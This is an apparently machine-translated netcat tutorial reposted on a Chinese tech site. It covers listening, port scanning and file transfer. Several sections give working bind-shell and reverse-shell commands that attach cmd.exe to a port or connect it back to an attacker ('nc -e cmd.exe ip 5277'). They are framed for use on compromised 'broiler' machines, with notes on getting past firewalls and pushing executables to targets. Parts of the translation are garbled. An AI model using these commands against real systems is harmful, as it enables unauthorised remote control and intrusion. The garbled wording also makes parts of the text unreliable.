Shulou(Shulou.com)06/01 Report--

1) Connect to the REMOTE host, for example:

Format: nc-nvv 192.168.x.x 80

Explanation: connect to the TCP80 port of 192.168.x.x

2) listen to LOCAL hosts, for example:

Format: nc-l-p 80

Explanation: listen to the TCP80 port of this computer

3) scan the remote host, for example:

Format: nc-nvv-w2-z 192.168.x.x 80-445

Explanation: scan the TCP80 of 192.168.x.x to all ports of TCP445

4) bind REMOTE CVM to SHELL, for example:

Format: nc-l-p 5354-t-e c:\ winnt\ system32\ cmd.exe

Explanation: the CMDSHELL bound to the REMOTE host is on the TCP5354 port of the REMOTE host

5) REMOTE CVM binds SHELL and connects in reverse, for example:

Format: nc-t-e c:\ winnt\ system32\ cmd.exe 192.168.x.x 5354

Description: bind the CMDSHELL of the REMOTE host and reverse connect to the TCP5354 port of 192.168.x.x

6) used as a * program, for example:

Format 1:type.exe c:\ exploit.txt | nc-nvv192.168.x.x80 format 2:nc-nvv192.168.x.x80

Explanation: connect to port 80 of 192.168.x.x and send the content of'c:\ exploit.txt' in its pipeline (the two formats do have the same effect, it is the same: P) attached:'c:\ exploit.txt' for shellcode, etc.

7) used as a honeypot [1], for example:

Format: nc-L-p 80

Explanation: use'- L'(note that L is uppercase) to keep listening on a port until ctrl+c

8) for use as a honeypot [2], for example:

Format: nc-L-p 80 > c:\ log.txt

Explanation: use'- L'to monitor a port until ctrl+c, and output the result to'c:\ log.txt''. If you change'& gt;''to'> >', you can append the log:'c:\ log.txt' is the log, etc.

9) used as a honeypot [3], for example:

Format 1:nc-L-p 80

Format 2:type.exe c:\ honeypot.txt | nc-L-p 80

Explanation: use'- L'to listen to a port until ctrl+c, and send the contents of'c:\ honeypot.txt' 'into its pipeline.

Command 1: monitor commands

Nc-l-p port

Nc-l-p port > e:\ log.dat

Nc-l-v-p port

Parameter explanation:

-l: listen for ports, listen for inbound information

-p: followed by the local port number

-v: displays information about the port, or more detailed information about the port if you use-vv

Tip: generally, everyone likes to use-vv.

Nc-l-p 80

This is very simple. Listen to port 80.

If you run this command on the machine, port 80 is considered open and can deceive many scanners.

Nc-l-p 80 > e:\ log.dat

Ha ha, the function is the same as above, but with the addition of "> e:\ log.dat", I think anyone who has learned the command ECHO will know that it is to create a log.dat log file on disk E.

Nc-l-v-p 80

Similar to the above command, but this time it will not be recorded in a file, but will be displayed directly on the screen running NC.

Ha ha, after talking so much, let's put it into practice.

Nc-l-v-p 80

Then enter the native IP:127.0.0.1 in the browser

Oh, what do you see?

Similarly, the above two are the same. Let's try it on your own.

Command 2: program orientation

Nc-l-p port-t-e cmd.exe

Local machine: nc-l-p port or nc-l-v-p port

Target machine: nc-e cmd.exe ip port

Parameter explanation:

The two parameters-l and-p have been explained

-e; the function is program orientation

-t: reply in the form of telnet

Examples

Nc-l-p 5277-t-e cmd.exe

Do you know where it runs? Do not run on your own machine, if you run, your machine will become a TELNET server, hehe, explain: listen to the inbound information of the local port 5277, while redirecting the CMD.exe program to port 5277, when someone connects, let the program CMD.exe respond to the connection request in the form of TELNET.

To put it bluntly, it is actually to make him a TELNET broiler, so this command should be run on your broiler. (voiceover: say so many times as we idiots, go on! )

Ha ha, let's try to find a broiler, I TELNET IP 5277

What about HOHO~~?

Local machine:nc-l-p port (or nc-l-v-p port)

Remote machine:nc-e cmd.exe ip port

As we all know, Grey Pigeon and God Thief, both of these tools make use of the rebound port.

What is a bounce port? That is to say, when the other party wins the horse, you do not have to take the initiative to connect with the other side, that is, you do not have to send a request connection from your client side to the server side running on the other side's host, but the other side takes the initiative to connect to you, which can invalidate many firewalls, because many firewalls do not check outbound requests.

When these two commands are combined here, they can be said to have the same effect on those two. Why? Aah! Let me tell you something! (pay 100000000RMB tuition first) Wow, don't kill me!)

Nc-l-p 5277 (listening local port 5277)

It can also be used

Nc-l-v-p 5277

Run locally and then on a remote machine, find a way to run it.

Nc-e cmd.exe ip 5277

(don't really hit "ip" on the meat machine) do, xxx.xxx.xxx.xxx like this!

Ha ha, look what appears on the local machine?

This is the bounce ~ ~ get a SHELL on the local machine

Command 3: scan Port

Nc-v ip port

Nc-v-z ip port-port

Nc-v-z-u ip port-port

Parameter explanation:

-z: turn off the input and output and use it when scanning

Nc-v ip port

This command scans for a certain port

For example:

Nc-v ip 135

Scan port 135 of the remote host to get some simple information about that port, but for some ports, we can get more information

For example: Port 80

We can use nc-v ip 80 and then use the get method to get information about each other's WEB server

Nc-v-z ip port-port

This command is a command for scanning. This command is used to quickly scan TCP ports, while port-port specifies the range of ports to scan.

For example:

Nc-v-z ip 1-200

You can see the opening of the 1-200 TCP port on my machine.

Nc-v-z-u ip port-port

This command has more-u than the last command. The function of this command is still to scan the port, but with an extra parameter of-u, which is used to scan the UDP port.

For example:

Nc-v-z-u ip 1-200

This command will scan 1-200 UDP ports.

Command 4: transfer file (HOHO,I LIKE)

LOCAL MACHINE:nc-v-n ip port

Y:\ svr.exe

Parameter explanation:

-n: the IP address of the specified number

The two commands are combined to transfer files.

First, run the command on the remote machine:

Nc-v-l-p 5277 > c:\ pulist.exe

Do you still remember this order? Ha ha, is it similar to listening commands? yes, that's right, this is listening to port 5277 and writing the received information data to c:\ pulist.exe. Run on the local machine at this time.

Nc-v-n ip 5277 < e:\ hack\ pulist.exe

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.